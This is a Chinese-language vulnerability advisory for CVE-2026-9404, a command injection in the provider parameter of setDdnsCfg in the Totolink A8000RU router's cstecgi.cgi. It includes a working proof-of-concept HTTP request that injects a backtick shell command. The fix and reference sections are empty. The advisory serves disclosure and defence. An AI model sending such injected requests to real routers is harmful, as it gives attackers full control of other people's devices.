Totolink A8000RU 命令注入CVE-2026-9404
A8000RU 是 TOTOLINK 推出的旗舰级AC4300三频千兆无线路由器,该产品主打高带宽、多设备并发、家庭 / 中小企业高端无线场景。
一、基本情况
A8000RU 适配千兆光纤宽带,适合大户型、复式住宅、中小型办公场所,可稳定带动数十台设备同时联网,满足高清影音、大型网游。
Totolink A8000RU 是中国路由器厂商 Totolink 出品的无线路由器设备,采用 MIPS 架构嵌入式固件,长时间高负载运行不易过热降速。

Totolink A8000RU 代号 Gladiator(角斗士),上市时间较早,老旧固件存在安全漏洞;功耗偏高;固件更新频次低,新功能适配较少。
栋科技漏洞库关注到 Totolink A8000RU 固件 7.1cu.643_b20200521 版本命令注入漏洞,追踪为CVE-2026-9404,CVSS 3.0评分9.8。
二、漏洞分析
CVE-2026-9404漏洞是存在于 Totolink A8000RU 相关固件版本的安全漏洞,远程攻击者可通过构造恶意请求执行任意操作系统命令:
该漏洞位于 cstecgi.cgi 中,受影响版本中Web Management Interface 的 setDdnsCfg 函数未对 provider 参数进行安全过滤,
直接将用户输入通过 snprintf 拼接到系统命令字符串中,攻击者可利用反引号注入任意 OS 命令,导致路由器被完全控制。

在 sub_430128 函数中,程序读取用户传入的参数 provider,并将其值传递给 libcscommon.so 库中定义的 Uci_Set_Str_By_Idx 函数。
可见参数 v3 被传递给 Uci_Set_Str 函数。
随后,provider 的值通过 snprintf 拼接进 v11,v11 的内容会由 CsteSystem 函数处理。

最终,命令会在 CsteSystem 函数中通过 execv () 执行。

修复版本中通过添加输入过滤或使用安全 API 防止命令注入,但截至报告生成时尚未发现官方发布修复固件。
三、POC概念验证
1、poc代码
将 provider 参数赋值为ls>./setDdnsCfg.txt,路由器便会执行该命令,示例如下:
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.6.2
Content-Length: 85
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Origin: http://192.168.6.2
Referer: http://192.168.6.2/basic/index.html
Accept-Encoding: gzip, deflate, p
Cookie: SESSION_ID=2:1772465702:2
Connection: keep-alive
{"topicurl":"setDdnsCfg","enable":"1","provider":"`ls>./setDdnsCfg.txt`"
}

2、验证结果
提交HTTP请求后,观测到文本文件成功生成,文件内容为对应目录下的文件列表,证明该命令已正常执行。


四、影响范围
TOTOLINK A8000RU 7.1cu.643_b20200521
五、修复建议
六、参考链接
管理员已设置登录后刷新可查看